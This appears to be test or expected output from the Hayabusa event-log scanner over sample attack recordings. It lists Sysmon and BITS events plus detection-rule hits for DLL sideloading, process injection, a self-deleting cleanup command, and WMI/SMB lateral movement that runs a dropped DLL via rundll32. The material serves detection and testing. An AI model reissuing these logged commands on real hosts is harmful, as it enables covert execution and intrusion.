+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.312 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: <unknown process> | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,../hayabusa-rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.130 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:10.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 01:27:10.791 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
+2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 07:52:31.218 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:52:34.966 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:01.646 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:04.161 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:04.924 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.633 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.720 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:05.822 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
+2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
